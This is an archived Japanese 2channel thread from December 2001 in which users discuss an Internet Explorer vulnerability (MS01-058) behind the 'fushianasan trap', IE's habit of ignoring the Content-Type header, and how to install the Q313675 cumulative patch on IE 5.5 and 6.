5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

またIEにセキュリティホール!

1 :もしガイシュツだったらスマソ:01/12/18 02:28
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20011216/1/

2 :名無しさん@お腹いっぱい。:01/12/18 02:30
スレは立ってないだろうけど超既出。まあいいけど

3 :もしガイシュツだったらスマソ:01/12/18 02:33
>>2 そうなのか、すまぬ。

4 :名無しさん@お腹いっぱい。:01/12/18 02:36
どんまい。つーか酷い穴が次々と出てくるなぁ

5 :名無しさん@お腹いっぱい。:01/12/18 02:39
ふしあなトラップってIE5.5と6.0だとスクリプト切っても
実行されるらしい。これってまずいんじゃないか?

6 :もしガイシュツだったらスマソ:01/12/18 02:39
>>4 この板ふたりしかいないみたいですね。

7 :名無しさん@お腹いっぱい。:01/12/18 02:40
3人目がいたぞ!

8 :名無しさん@お腹いっぱい。:01/12/18 02:41
いやもうちょっといるだろ・・・ROMってる人が。

9 :もしガイシュツだったらスマソ:01/12/18 02:41
>>5 こんにちは3人目さん(w

10 :名無しさん@お腹いっぱい。:01/12/18 02:42
俺も混ぜてYO!

11 :名無しさん@お腹いっぱい。:01/12/18 02:42
proxomitron

12 :名無しさん@お腹いっぱい。:01/12/18 02:42
続々と増えたけどスレと関係ないな

13 :名無しさん@お腹いっぱい。:01/12/18 02:42
思い切ってオープンソースにすれ

14 :もしガイシュツだったらスマソ:01/12/18 02:44
なんだ、結構いますね。

15 :名無しさん@お腹いっぱい。:01/12/18 02:44
つーかfushianaトラップは拡張子関係無しなのは何故?
Content-typeをどうにかしちゃってる訳?乗り遅れてソースも
見れなかったから分析もできん。

16 :名無しさん@お腹いっぱい。:01/12/18 02:45
>>15
これがソースっぽいです。
http://teri.2ch.net/test/read.cgi/accuse/1008597418/799

17 :名無しさん@お腹いっぱい。:01/12/18 02:47
もういいかげんにしてくれ・・IEよ。お前とはもうやっていく自信がない・・。

18 :名無しさん@お腹いっぱい。:01/12/18 02:49
>>16
セキュリチーホールmemoに有った奴と同類け?

19 :もしガイシュツだったらスマソ:01/12/18 02:51
>>17 何よ!私と別れてネスケちゃんと付き合うつもりなの。

20 :名無しさん@お腹いっぱい。:01/12/18 02:55
調子こいてつまらん機能追加・拡張ばっかするからだよ。
糞ヴァカチンがぁ!>M$

21 :名無しさん@お腹いっぱい。:01/12/18 02:55
fushianaトラップはネスケなら防げるのか?

22 :名無しさん@お腹いっぱい。:01/12/18 02:56
>>21
やってみれ

23 :名無しさん@お腹いっぱい。:01/12/18 02:57
>>22
いや、ネスケ入れてないし。
入れててもやるのは怖い・・・。

24 :名無しさん@お腹いっぱい。:01/12/18 02:58
>>16
おおサンクス。でもスクリプトの部分は結構どうでもよくて、
MIMEタイプを無視してスクリプト実行ってところが知りたいんだよ。

25 :名無しさん@お腹いっぱい。:01/12/18 03:02
ネスケは6.0使ってあまりの出来の悪さに愕然としたけど、
最近6.2使ってみたらかなりいい感じだったから今はメインで使ってる。

26 :名無しさん@お腹いっぱい。:01/12/18 03:58
>>24
WindowsはContent-Typeでダイアログを出さずに開くか、どう言うアプリケーションで
処理するかと言うことを判断、それをシェル送りにして、シェルが拡張子で判断し実行
がW32.Badtransとか。
fushianaトラップは、image/gifとかはインターネットエクスプローラー送りで、
HTMLも同じくIE送り、IEがContent-Typeとか拡張子を見ずに、ファイル内の情報
だけで判断、処理。だいぶん前のIEでも.jpgと言う拡張子の付いた.gifをGIFとして
開く機能があったような… 初心者のサイトで拡張子ぐちゃぐちゃの所があって、
ダウンロードしてグラフィックソフトなどで開こうとすると開けなくて、
Webだとちゃんと見れると言うことがありマスタ(w
画像などのバイナリファイルとかでも、内部に目印になる部分があるから、それで判断
できるんだよね、つまり「画像ファイルなんだから実行されるまい」と言うこちらの
思い込みの方がバグなんかも(^−^;;
画像ファイルでないからHTMLだとして処理してしまうIEでしたとさ・・・

27 :名無しさん@お腹いっぱい。:01/12/18 04:09
人間はミスを犯す生き物だが、
こう見事なセキュリティホールだと「意図的か?」と疑いたくなるな。

28 :びるげいつ:01/12/18 04:19
MSは意図的にお客様のセキュリティーを無視している…
そんなもんにコスト掛けるような企業は負け組だよ(w
(自分にはセキュリティー)

29 :名無しさん@お腹いっぱい。:01/12/18 04:23
ブラウザ診断で
T312461てけつについてたら
いいんですか?
今のところ・・・・・・・・・・

30 :名無しさん@お腹いっぱい。:01/12/18 04:25
↑スマソ柿忘れ
自分IE5,5サービスパッコ2です

31 :名無しさん@お腹いっぱい。:01/12/18 06:27
>>29
バージョン情報
IE SP2 Q306121 Q312461 Q313675
↑今回の修正ソフト

32 :名無しさん@お腹いっぱい。:01/12/18 07:17
なるほど出るのか
5.5SP3と6SP1

33 :名無しさん@お腹いっぱい。:01/12/18 09:25
>>26
情報ありがとう、やっぱりか…
以前になんかのプログラム作ったとき、IE(5.0だったかな?)が
Content-typeばっちり無視してくれちゃったから
腹立ったと同時に、やヴぁいんじゃないのって思ったことが
あったんだけど、今でもそうだったとは…

34 :名無しさん@お腹いっぱい。:01/12/18 09:35
Content-type: text/plain

<html><body><h3>Hello World!!</h3></body></html>

これもIEは無視だもんなぁ… ってことはネスケは
問題無いってことか。まあ正体がわかればどうでも
いいけどね。でもTIME2は怖い

35 :名無しさん@お腹いっぱい。:01/12/18 10:00
ちなみに↑はIEだとHTMLとして認識されるけど、
<html>の前に文字を200バイト分書いておくとテキストと
して認識される。200バイト読み込んでヘッダ判別とか
してんのかね。最悪。

36 :名無しさん@お腹いっぱい。:01/12/18 13:35
Windows 2000 SP3(・ε・)マダ?

37 :名無しさん@お腹いっぱい。:01/12/18 14:08
ところで、今回の修正パッチ当てたら、再起動後にIEが
「通常使用するブラウザ」でなくなっていたみたい。
インターネットオプションのプログラムタブで問い合わせるように
設定しておけばそこでチェックできるけど、
問い合わせない設定にしておいて、通常使用する・・・が外れていると
OEとかWordとかでURLリンクしなくなるかもしれん。
これが起こるとするとあちこちで質問が発生するかもなあ。
ちなみに、98SEなんだけど。

38 :名無しさん@お腹いっぱい。:01/12/18 14:29
さっきの書き込みちょっと間違ってた。

-----------------------------------------
Content-type: text/plain

<html><body><h3>Hello</h3></body></html>
-----------------------------------------

このままだとHTMLとして認識される。

ヘッダの後(本体部分)に200バイトの文字列を書き込んで
表示させるとHTMLと認識。でもリロードするとテキストとして認識。

251バイト書き込んで表示させると最初からテキスト表示。

…なんだかIEは意味がわかりません。Content-typeヘッダはなんの為のもの?

39 :37:01/12/18 14:36
続報
WIN98SEで、q313675パッチを実行して再起動後に
なんか、通常使うブラウザの設定が外れるみたいで、
そのままだと、Word2000でURLとみなされる文字列に
見かけ上リンクがされたようになるんだけど、クリックでエラー。
IE起動して、ツール→インターネットオプションのプログラムで
通常使用するブラウザについて起動時問い合わせるにチェック、
いったんIEを起動して問い合わせを行わせ、
通常使う設定にすれば、Wordもリンクできるようになった。
どうでもいい人にはどうでもいい話なんだけど。

ついでで悪いが、
>>38
> Content-typeヘッダはなんの為のもの?
人が見るためのものだとか??

40 :名無しさん@お腹いっぱい。:01/12/18 17:32
>>26
マルチポストになるけどContent-Typeは関係ありません。

41 :名無しさん@お腹いっぱい。:01/12/19 01:01
>>40
MSから送られてくる、セキュリティー警告サービスMS01-058にちゃんと書いてあるよん
HTML ストリームの Content-Dispostion ヘッダ フィールドおよび
Content-Type ヘッダ フィールドと言うことでIE5.5は関係ないと言うことなので、
もしかしたら、fusianasanトラップは未発見ホールかも!!!!
うちはIE5.5SP1であてれる限りのパッチはあててあって、W32.Badtransの時は
開くか確認のダイアログが出たはず、なのに今回のfusianasanトラップは動きます!!!!
(Content-Type単独のものはすでに出ていてあててますので、未発見の可能性高し!)
誰かMSに報告してみれ、2ch発の掲示板型ウイルスだよ!!!!

42 :名無しさん@お腹いっぱい。:01/12/19 01:34
>>41
未発見ホールもなにも・・・単に、節穴さんという他の掲示板システムにはない
特殊な機能を提供している2ch側の問題なのでは?

43 :テコキ君:01/12/19 01:34
>>41
漏れ、鎖に繋いで有るけどな。。1478.jpgの方。。。
マイ糞、なんか賞金くれるかな。。。
つか、、、殆ど仕様でしよう・・・なんちて(w
別にヘッダ部分はノーマルhtml。。拡張子違うの除けば。
ノーチェクでスクリプト走らせるTIME2が一応問題あり仕様みたいだけど。。。

ほんとわsageレスだけど上の方のスレに嫌なもん貼ってあるから
アゲ

44 :名無しさん@お腹いっぱい。 :01/12/19 01:53
たった今パワーアップしました。
IEはスリルがあって楽しいですね!

>もしかしたら、fusianasanトラップは未発見ホールかも!!!!
ええぞー
祭りの予感。

45 :名無しさん:01/12/19 03:20
私今、
IE SP2 Q306121 Q312461

なんですけど、新しいパッチをDLして実行しようとしたところ
「このプログラムを実行するには、SP2が必要です」と出ちゃっ
て結局あてられません。

うぇぇん。
どうしたらいいのぉ〜(泣)

46 :名無しさん@お腹いっぱい。:01/12/19 03:24
これってmac版IEもやばいんですか?
初心者な質問スマソ

47 :名無しさん@お腹いっぱい。:01/12/19 04:19
>>45
俺もだよ。
非常に困ってる。

48 :45:01/12/19 04:48
>>47
同士!

結局
IE5.5 SP2 Q306121 Q312461
      ↓
    IE5.5 SP2
      ↓
IE5.5 SP2 Q313675
に変更しました。
わざわざもう一度SP2に戻すのにえらい時間かかって大変ダターヨ(T皿T)
とりあえず、一安心。

つくづくMSムカツク!

49 :47:01/12/19 04:58
>>48
ごめん俺の説明が足りなかった。俺の場合、Q306121 Q312461
も入っていない状態でダメだった。

とりあえず今入っているSP2をアンインストールして、
もう一度試してみる。

50 :47:01/12/19 05:15
やってみたが、やっぱりダメだ。
もう訳がわからんのでIE5.02に戻すか・・・

51 :名無しさん@お腹いっぱい。:01/12/19 05:36
IE5.02ってあったっけ

俺のIEは正式バージョン5.00.3314.2100って書いてたんだけど大丈夫なの?

52 :名無しさん@お腹いっぱい。:01/12/19 06:01
分かりにくいですよね><

バージョン5.00.3314.2100は安全でしょうか…
どなたか答えてくれるとうれしいです。

53 :名無しさん@お腹いっぱい。:01/12/19 06:42
M$は金あるんだから5.01のパッチをずっと作ってくれてもいいじゃん。

一昨日の2ちゃんのIPさらし問題やIE6のクッキー漏洩問題にしても
5.5と6は仕様がめちゃ甘いんだよ。
5.01のパッチ作れ!!

54 :名無しさん@お腹いっぱい。:01/12/19 06:43
>>51-52
5.02なんてのは存在しない。
5.01はもうサポート外になりつつある。
今回のパッチもあてられん。
5.5SP2導入&最新パッチをあてとくのが吉。

更新バージョンに、SP2とQ313675 が記述されればOK。

うまくパッチがあたらない場合はIEの修復かけてみるのはどうだろうか?
試してうまくいった人がいれば報告求む。

55 :名無しさん@お腹いっぱい。:01/12/19 06:57
さっきパッチ当てました。
バージョン:5.50.4807.2300
更新バージョン:SP2;Q312461;Q313675;

となりました。これで大丈夫?まだ何か足りないでせうか?

56 :名無しさん@お腹いっぱい。:01/12/19 07:07
よくわかんねぇ〜

この修正プログラムをインストールするにはIE 5.5 SP2が必要です。

って出てインストールできないよ〜。
なんで〜。
なんか間違えている?

57 :名無しさん@お腹いっぱい。:01/12/19 07:16
>>55
それでOKだ。安心しなされ。
でも、また新しくパッチが出るかもしれないのでセキュリティ情報のページはこまめに覗いとくといいぞ。

>>56
SP2になってないんじゃないのか?
なってるのなら修復 or 以前のバージョン戻す→再度5.5SPインスト
それから再度パッチをあててみてくださいな。

58 :ななし:01/12/19 07:31
sp3が出るまで待つ。・・・大ジョブか?

59 :名無しさん@お腹いっぱい。:01/12/19 07:33
どうせなら6..0にしよう。

60 :55:01/12/19 07:35
>>57
おお・・ありがとうございます。安心しました。
でもまた穴が見つかるんでしょうね。まめにチェックしますね。

61 :名無しさん@お腹いっぱい。:01/12/19 07:35
上に大きく「Internet Explorer5.5と6は危険です。」と
書いてあるけど、5.01は言わずもがななんですか?

62 :56:01/12/19 07:39
>>57
いやぁ、できました。どうもありがとやんした!
60さんの言うとおり、チェックはこまめにしましょうや、ですね。

63 : :01/12/19 07:49
>>61
今回のfusianaトラップはHTML+TIME2という新技術を応用したもの
5.01は単に実装されていなかっただけだと思われ

64 :名無しさん@お腹いっぱい。:01/12/19 07:58
>>54
更新バージョンに、SP2とQ313675 が記述されればOK
とありますが

先程更新したら、5,5SP2のQ312461になりました。

うまく、インストールされてないのでしょうか?

65 :61:01/12/19 07:59
>>63
今回のfusianaトラップは置いといて、他のweb巡回するときは
(5.01SP2+パッチ)よりも(6.0+パッチ)の方が安全ですか?

66 :名無しさん@お腹いっぱい。:01/12/19 08:07
>>64
それは11月に出たパッチだと思われ。それも必要だけど、
Windows Updateじゃなくここから落として当てるのだ。
ttp://www.microsoft.com/japan/technet/security/current.asp?url=/japan/technet/security/frame_prekb.asp?sec_cd=MS01-058

67 :名無しさん@お腹いっぱい。:01/12/19 08:16
>>66
ありがとうございます。
Cドライブのどこにダウンロードすれば、いいのですか?

68 :名無しさん@お腹いっぱい。:01/12/19 08:19
>>67
落とすのはどこでもいい。落とした後実行すればOK。
更新かかった後再起動を促してくる。

69 :名無しさん@お腹いっぱい。:01/12/19 08:22
>>68
ありがとうございます、やってみます。

70 :名無しさん@お腹いっぱい。:01/12/19 08:23
>>65
5.01には今回のパッチはあてられん・・・5.5SP2か6.0にしとけ。

それと激しくガイシュツだけど、
IEはOSに相性が良いバージョンを入れておくのがベストだ。
XP以外なら5.5SP2がよいだろうね。
でも俺はMe+IE6.0なのだが(w

71 :69:01/12/19 08:41
更新バージョン:SP2;Q312461;Q313675;
に更新できました。ありがとうございました。

72 :名無しさん@お腹いっぱい。:01/12/19 09:15
>>70
MEと最も相性の悪いのは
実は5.5だと思われ。

さっきq313675インストールしたんですけど、
その後、q313675.exe以外に
削除してしまってかまわないファイルってあるのでしょうか?

73 :名無しさん@お腹いっぱい。:01/12/19 09:24
98SEで6の標準インストールしとる。
相性はともかく重いよ6

74 :名無しさん@お腹いっぱい。:01/12/19 09:27
Meと6は相性いいと思うぞ
少なくともうちではいい

75 :名無しさん@お腹いっぱい。:01/12/19 09:28
>>73
タブブラウザ使いなよ。軽いよ。

76 :名無しさん@お腹いっぱい。:01/12/19 10:15
5.5SP2はパッチ三つ当てた方が良いんじゃない?
Q306121,Q312461,Q313675

うまくいかない人は、ダウソしないで、その場から実行してみれば?

77 :名無しさん@お腹いっぱい。:01/12/19 10:31
今Q306121見に行くと、q313675に飛ばされるよ。
q313675がQ306121を包含しているんじゃない?

78 :名無しさん@お腹いっぱい。:01/12/19 10:41
>>73
98でIE6だけど5.5のほうが重たかったよ。
何よりリソース食いで閉口した・・・
一番快適だったのは5.01かな。
今回のトラップにも関係無いみたいだし、
5.01の方はそのままがいいかも。

79 :名無しさん@お腹いっぱい。:01/12/19 10:53
このプログラムってWINDOWS UPDATEには適用されてないのね。
つーか
http://www.microsoft.com/windows/ie/downloads/critical/q313675/download.asp
んなページがあるなんてはじめて知ったよ.......鬱

80 :名無しさん@お腹いっぱい。:01/12/19 11:08
>>78
俺98SEで5.01だ

81 :名無しさん@お腹いっぱい。:01/12/19 11:11
>>79
Nimda・Badtransなどのウィルス流行で結構セキュリティ情報のページはリンク貼られてたと思うのだが・・・
今回は2ちゃんの各板のTOPで大々的に貼られたからな。

82 :名無しさん@お腹いっぱい。:01/12/19 12:42
うちの5.5SP2にパッチ当てたら
「更新バージョン:;SP2;Q312461;Q313675;」って表示されてるけど
これでいいんですか?

83 :名無しさん@お腹いっぱい。:01/12/19 12:50
>>82
それでいいんです。っていうか、たったの80レスくらいの
スレなんだから全部読んでから質問しれ。

84 :名無しさん@お腹いっぱい。:01/12/19 12:53
5.01は個人的には好きだよ。
けど、今回のホールは無関係なようだけど、前の修正パッチが対応していた
クッキーに関わる問題点はどうだったんだろう。
あのとき5.01用のパッチは公開されなかったことから、
見捨てられたとか言われていたものだったが。

85 :82:01/12/19 12:56
>>83
すんません、>>55に書いてありましたね。今後気をつけます。

86 :名無しさん@お腹いっぱい。:01/12/19 13:11
>>84
MSが「もう5.01はサポートしない」って宣言したじゃん。

87 :名無しさん@お腹いっぱい。:01/12/19 13:18
んで、結局、今回のは何をしたら(見たら)どーなるワケ?
何かをみたらどっか壊れるとか?
原因と症状きぼーん

88 :名無しさん@お腹いっぱい。:01/12/19 13:23
>>87
わざわざ2ch各板のTOPにリンク張ってくれてるんだから見ろよ。

89 :名無しさん@お腹いっぱい。:01/12/19 13:43
だれかこれまともな日本語に訳してくれない?

以前ノートン入れているにも関わらず、2ちゃんでの書き込みが
全て他人に見られている。てな相談があったよね。それって
このこと?

2 番目の脆弱性は、マイクロソフト セキュリティ情報 MS01-015 で
説明された 「フレームのドメイン照合」 の脆弱性の変種が新たに
発見されたものです。この脆弱性により、悪意のある Web サイトの
オペレータは、ブラウザ ウインドウの 1 つを Web サイトのドメイン
に、もう 1 つをユーザーのローカル ファイル システムに、という
ように 2 つのブラウザ ウインドウを開き、後者から前者に情報を
渡すようにします。これにより Web サイト オペレータは、ブラウザ
ウインドウで開くことができるユーザーのローカル コンピュータ上の
ファイルをすべて読み取ることができる可能性があります。しかし、
ファイルを変更することはできません。この脆弱性は Internet
Explorer 5.5 および 6 の両方のバージョンに影響を及ぼします

90 :87:01/12/19 13:49
見たけど、むつかしーことを細かい字でわかりにくくかいてるので
よーわからんのよ。
「感染してるサイトを見たら貴方のPCがこわれます」とか、
「変なメールが来て、添付ひらいたら貴方のPCがこわれます」とか
みたいに、アホでも老人にもわかるように書いて欲しい。
だれか、わかるように簡単に説明して下さい〜。

91 :名無しさん@お腹いっぱい。:01/12/19 13:54
分からないから勉強しよう、という気にはならんのか。

92 :名無しさん@お腹いっぱい。:01/12/19 14:00
>>91
これは頭は良いが<あほ>な大学教授が出版した本と同じで
オナニーでしかありえない。
だいたい勉強なんて暇な学生だけできること。具体的に
分かり易い説明をせず、こんな駄文のせるMSはばか。

建前より本音を聞かしてくれ!ってな感じだよ。

93 :名無しさん@お腹いっぱい。:01/12/19 14:02
>>92
いや、あんたが馬鹿なだけだと思う。
書いてあるじゃん、
「ユーザーのローカル コンピュータ上の
ファイルをすべて読み取ることができる可能性があります」
って。この意味が分からないなら回線切って首つって市ね。

94 :名無しさん@お腹いっぱい。:01/12/19 15:39
>>93
>>92は部分的なことをいっているんじゃないと思うよ。
<簡単なことを無理に形式ばった言葉を使い難しくしている。>
これが言いたいのでは?
ヘルプもそうだけど分かりにくいからね。

95 :名無しさん@お腹いっぱい。:01/12/19 15:49
1 番目の脆弱性は、HTML ストリームの Content-Dispostion
ヘッダ フィールドおよび Content-Type ヘッダ フィールドの
処理のある問題に関連しています。これらのフィールド、ホストする
URL、ホストされるファイル データによって Internet Explorer
でのダウンロードでファイルが処理される方法が決定されます。
攻撃者が HTML のヘッダ情報をある特定の方法で変更した場合、
Internet Explorer が、実行可能ファイルが実際は別の種類の
ファイルで、ユーザーに確認を取らずに開くことができるファイルだと
認識してしまう可能性があるため、セキュリティ上の脆弱性が発生
します。これにより攻撃者は、開かれると自動的に実行可能ファイルが
ユーザーのシステムで実行されてしまう Web ページまたは HTML
メールを作成することができます。この脆弱性は Internet Explorer
6 のみに影響を及ぼし、Internet Explorer 5.5 には影響はありま
せん。

以下 略・・
これを日本語に訳すとどーなるよ!?

96 :名無しさん@お腹いっぱい。:01/12/19 15:51
↑もちろん、わかりやすい 日本語、だな。
とりあえず「脆弱性」ってなに?弊害あるの?

97 :名無しさん@お腹いっぱい。:01/12/19 16:03
>>89
人の名前の商社の産業スパイ事件ネタが昔あったな。
あれネタじゃなかったんだ。
ウイルスばら撒いて喜んでるのは所詮二流で、一流は
こんな感じで他社、個人の機密を盗んでるんだろうね。

バスター、ノートン共に意味なし。しかしパソコンを2台
買わないといけないのは痛い。

98 :名無しさん@お腹いっぱい。:01/12/19 16:05
HTMLに細工されるとIEが血迷って確認画面を出さずにファイルを実行してしまう
かもしれないから気をつけましょうと。

99 :M$:01/12/19 16:05
>>96
セキュリティの脆弱性とは、製品の適切な使用による場合でも、
攻撃者によるユーザー システムに対する特権の不正行使、
操作の制限、システム上のデータの損傷、および許可されて
いない信頼の偽装を防止不能にする、製品に含まれる欠陥である。

100 :名無しさん@お腹いっぱい。:01/12/19 16:22
相変わらずM$のサイトの文章って言いたいことがよくわかりません。
もうちょっとわかりやすく書いてくれたらなぁ…わざとむつかしい言葉使ってません?

これじゃこういう記事を読む必要が一番ある初心者に敬遠されちゃうような

101 : :01/12/19 16:23
ところで攻撃者ってどのくらい存在したの?

102 :名無しさん@お腹いっぱい。:01/12/19 16:28
解ったような気がするものの、それが解らないような気がする、
そんな気がしないでもないわけでもないのれある
氏ねやMS

103 :名無しさん@お腹いっぱい。:01/12/19 16:36
これならわかるだろう。
http://www.zdnet.co.jp/news/0112/17/e_ie.html

104 :名無しさん@お腹いっぱい。:01/12/19 16:40
>>103
どっからパッチを落とせばいいのかわからん。

105 :名無しさん@お腹いっぱい。:01/12/19 16:46
なんかこのスレ激しくレベル低くないか?

106 :名無しさん@お腹いっぱい。:01/12/19 16:50
>>104
アクセシビリティから逝くのが一番わかりやすいと思うよ。
http://www.microsoft.com/japan/enable/products/security/

107 :名無しさん@お腹いっぱい。:01/12/19 16:50
IEの右上の×ボタンとかが数字に変わってしまっているのだけれど
どうしてだろう。。。

108 :106:01/12/19 16:52
MSは文章がわかりにくいだけじゃなく、
webサイト内もメッチャわかりにくいんだよねー。

109 :名無しさん@お腹いっぱい。:01/12/19 16:53
>>107
前前からそのスクリンショットを見たいと思っていた

110 :名無しさん@お腹いっぱい。:01/12/19 17:01
普通のひとはWindows Updateしか利用しないはずだ。
どうしてMSは2ちぁんねらーだけに警告しているのか。
MSは何か隠している!

111 :名無しさん@お腹いっぱい。:01/12/19 17:03
>>110
???

112 :名無しさん@お腹いっぱい。:01/12/19 17:08
windowsの修正プログラム何入れたのかわかる方法ないんですかね?

113 :シャヴァーダ:01/12/19 17:26
>>107
それ、直したい?
ヒントは、ttdCacheの問題だよ。

114 :シャヴァーダ:01/12/19 17:27
すまん、ttfCacheの間違い。

115 :名無しさん@お腹いっぱい。:01/12/19 17:27
こっちにも解説があるよ。
http://www.forest.impress.co.jp/article/2001/12/17/iesecuritypatch.html

116 :名無しさん@お腹いっぱい。:01/12/19 17:36
>>112
IEのヘルプ→バージョン情報、更新バージョンを見る
MSのサイトにもちゃんと書いてある、ちっちゃーい字で(w

117 :名無しさん@お腹いっぱい。:01/12/19 17:39
いまの修正プログラムを入れると Q312461,Q313675 表示があるはず

118 :名無しさん@お腹いっぱい。:01/12/19 17:56
MSより2ちゃんの方がわかりやすいよ。(笑)

119 :名無しさん@お腹いっぱい。:01/12/19 18:26
ちょっと濃い目の情報が書いてあると
「日本語」として理解できない人
多いよね。。。

120 :祝!2ch発セキュリティーホール:01/12/19 18:35
>>110
http://www.microsoft.com/JAPAN/technet/security/bulletin/notify.asp
に入れ、毎週数通もややこしいメールが来るよ、
じきに専用フォルダーを作って読まなくなるかもしれないけど(w

MSのページがややこしいのは、ある程度の専門家にも分かりやすい情報を提供
するため、全部理解したければWeb周りのプログラミングとかの勉強をするしかない…

fusianasanトラップはIE6にしてQ313675にしても治らないyo!

121 :M$って:01/12/19 19:25
一般人向けの適切な説明を見た事がナイよ
エキサイト翻訳みたいになってるし

博士 様 様 様

122 :名無しさん@お腹いっぱい。:01/12/19 20:26
今までこのセキュリティーホールを利用されて、
情報を取られてたかどうか分かる方法ってないの?

123 :名無しさん@お腹いっぱい。:01/12/19 20:49
>>55さんと同じく、バージョン:5.50.4807.2300
なんですが、パッチ当てられません。何で駄目なんだろ…。
怖いよ〜!

124 :名無しさん@お腹いっぱい。 :01/12/19 23:04
本当に初歩的な質問でごめんなさい・・・
掲示板トップからjapaneseのダウンロード画面にとんで
DLしてきたんですが SP2;Q313675 としか表示されません
これだとQ312461が入ってないんですよね?
どこかで別にまたDLしなきゃだめなんでしょうか

現在 Win98SE IE5.50 SP2;Q313675
5.50.4807.2300 です

125 :名無しさん@お腹いっぱい。:01/12/19 23:30
>>124
累積プログラムだから、一番新しいのだけインストールすればOKダヨ。
Q306121、Q312461は内包されてマス。

126 :名無しさん@お腹いっぱい。:01/12/19 23:43
AOLを使ってるのですが、これはIE?それともネスケ?
ブラウザのバージョン情報とか見ても載ってません。
どなたかご存知のかた教えてください。お願いします。
入れたらいいのかわからないよー。

127 :名無しさん@お腹いっぱい。:01/12/19 23:45
IE5.5 SP2で修正プログラム入れてない方は、
↓で順番にDLしていれてね。
http://microsoft.com/japan/enable/products/security/proglist.asp?prod=032&info=14

128 :名無しさん@お腹いっぱい。:01/12/19 23:55
>>127
リンク先見てきましたが

>既にいくつかの修正プログラムをインストール済みのお客様は、
>まだインストールしていない修正プログラムをインストールしてください。

と言いつつ

>複数の修正プログラムをインストールする場合は、必ず [順番] 欄の
>番号順(古い修正プログラム順)にインストールしてください。
>1 q306121.exe
>2 q312461.exe
>3 q313675.exe

と書かれてるんだけど…(混乱)どっちが正しいのだろ?
2と3がインスト済みで1だけまだなんだけど
最後に1を入れてもいいんだろうか?

129 :名無しさん@お腹いっぱい。:01/12/19 23:58
>>128
MSを信用するならq313675だけでよし。

>この修正プログラムは、インストールすると以前に説明され
>Internet Explorer 5.5 および 6 に影響を及ぼすセキュリティ上の脆弱性のすべてを
>排除する累積的な修正プログラムです。
>さらに、この修正プログラムで新たに発見された3 つの脆弱性が排除されます。

130 :名無しさん@お腹いっぱい。:01/12/19 23:59
Win98無印、IE5.01sp2使用者です。
今まで5.01で粘ってきたのですが、今回のセキュリティホールのことで
皆さんが5.5sp2か6.0にした方がいいと仰います。

で、うちのPCはとても貧弱な中古マシンなのですが(PU450MHz、メモリ64MB)
もしバージョンをあげるとしたら5.5sp2と6.0とどっちがマシでしょうか。
OSとの相性がどうとかログにあったので…
詳しい方お願いします。

131 :名無しさん@お腹いっぱい。:01/12/20 00:03
>>130
5.5SP2は98に入れるとタスクスケジューラが英語になるとかいう騒ぎがあった。
あと、漏れの使用感では6.0の方が軽い。

132 :名無しさん@お腹いっぱい。:01/12/20 00:05
少なくともCeleron300,256MBでIE6.0はそれなりに動いている
Pen2 450なら大丈夫だと思う

133 :128:01/12/20 00:05
>>129
ありがとう、了解しました。

ちなみに、試しに2と3インスト済状態で1を入れようとしたら
「実行するにはサービスパック2が必要です」と拒否されたです。
SP2は既に入ってても、2と3実行後は認識しないようですね。

134 :名無しさん@お腹いっぱい。:01/12/20 00:07
>>127
順番に入れてもいいけど、MS01-055とMS01-058は「累積的な修正プログラム」
だから、SP2以降のそれまでのバッチを全部含んでいるよ。
だから一番新しいMS01-058だけ当てとけばよいです。

それぞれの修正バッチの「問題の詳細」よく読むと
「修正プログラムに含まれる過去の修正」っていうとこで、前のバッチが
新しい方に含まれてることわかるはず。あ日本語変になってきた。

心配な人は古い順に全部当ててもいいけどね。別に問題はないわけだし。

135 :名無しさん@お腹いっぱい。:01/12/20 00:08
>>130
俺のマシンもPU450MHzだけど、Me+IE6でじゅうぶん実用になってる。
ただしメモリは増設したほうがいいかも。(俺のは128MB)

136 :130:01/12/20 00:14
>>130-131>>135さん
ありがとうございました。
私もどっちかというと6.0にしたかったので(5.5は評判が悪いので…)
アドバイスをもらい、決心しました。
メモリの増設…古いPCなのですが素人にも簡単にできるでしょうか?
(LANボードは自分で取り付けて設定することができました)
貧乏なんですけど5000円以内で、できますか?

ともかくありがとうございました。
セキュリティ板の方は本当に頼りになります〜(゚ー゚*)

137 :名無しさん@お腹いっぱい。:01/12/20 00:17
メモリの増設は簡単。
今は安く買えるし(5000円もしない)、がんばれ。

138 :Netscap6.2.1でも試してみるべか…:01/12/20 00:19

http://home.netscape.com/ja/download/

139 :名無しさん@お腹いっぱい。:01/12/20 00:28
>>130
LANボードより簡単っしょ。
でもPU450MHzで貧弱なんだあ。うちの会社なんてビンボーだから
Pen75MHz、メモリ48MBのWin95マシン現役で使ってるよ。
それにウイルス対策ソフトやIE5.5入れてムリクリに動かしてるんだもんな〜。(涙

140 :124:01/12/20 00:38
>>125さん、ありがとうございました!
その後のレスで、順番に・・とか色々解釈あるみたいですけど
とりあえずMS信用してこのままでいこうかと思います

いつも騒ぎがあるたびに、この板の人に助けられてるな〜
2ちゃんねらーで良かった(´∇`)

141 :130:01/12/20 00:39
>>137
はいっ ありがとうございました!
>>139
そうですか?
皆さんやれXP搭載だやれP4のチップ1.5GHzだメモリ256Mだを
あたりまえのように言うのでWin98のままの中古PCの自分は相当オンボロなのかな〜、と。
でもうちの会社のPCなら同じです。
当然のようにWin95だしノートの容量なんて700Mしかないの;

スレ違い失礼しました。ではこれから6.0にしてきまーす。

142 :5.00.3314.2101 SP2:01/12/20 00:49
5.5か6.0にしなきゃダメなの?
てゆーかMSのサイトで5.5or6.0をDL?
それともパッチなしをまず店に買いに行くの?

143 :名無しさん@お腹いっぱい。:01/12/20 00:57
>142 ネタだよな?
一応http://www.microsoft.com/japan/download.htm

144 :名無しさん@お腹いっぱい。:01/12/20 01:19
>>142
マジレスする。
そのままで構わない。今回のパッチは5.5か6.0の人に出たのであって、
わざわざ5.01ユーザーが変更する事ではないのです。

145 :名無しさん@お腹いっぱい。:01/12/20 01:22
>>144
≠142だけどホントですか?!!
5.01も悪影響あるかもしれないけど切り捨てられたから、
5.5と6.0のパッチだけ出たんじゃなかったの?

146 :名無しさん@お腹いっぱい。:01/12/20 01:28
>>142
http://microsoft.com/Japan/enable/products/security/verslist.asp?prod=032

147 :名無しさん@お腹いっぱい。:01/12/20 01:30
MS01-058が出た時点で5.01SP2は諦めて6.0に乗り換えました。
しかし激重になりました。
その結果IEはサブで使うようになりました。

148 :名無しさん@お腹いっぱい。:01/12/20 01:32
6.0は激重というけど
IEコンポーネントのタブブラウザ使っても重さは影響を受けますか?
